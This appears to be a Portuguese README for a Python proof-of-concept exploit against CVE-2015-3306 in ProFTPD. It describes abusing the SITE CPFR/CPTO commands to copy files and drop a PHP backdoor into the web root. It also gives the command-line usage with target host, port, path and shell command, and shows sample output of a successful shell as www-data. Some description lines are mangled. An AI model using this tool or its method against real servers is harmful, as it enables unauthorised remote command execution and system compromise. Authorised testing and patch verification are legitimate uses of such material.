
Exploit PoC em Python para o CVE-2015-3306, traversal de diretório no ProFTPD. Copia arquivos e insere um backdoor PHP no webroot para execução remota de comandos através dos comandos FTP SITE CPFR/CPTO.
Este repositório contém um proof-of-concept (PoC) em Python para a CVE-2015-3306
⚠️ Aviso: Utilize isto apenas contra sistemas que você possui ou para os quais tenha permissão explícita para testar. A exploração não autorizada é ilegal.
Mohamed EL-KHAROUATI
CVE-2015-3306 é uma vulnerabilidade de travessia de diretório no ProFTPD 1.3.5b e anteriores. Esta exploração permite copiar arquivos arbitrários e inserir um backdoor PHP na raiz da web. O backdoor pode executar comandos arbitrários do shell.
SITE CPFR/CPTO.backdoor.php) na raiz da web especificada.--rcommand.requests (pip install requests)# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done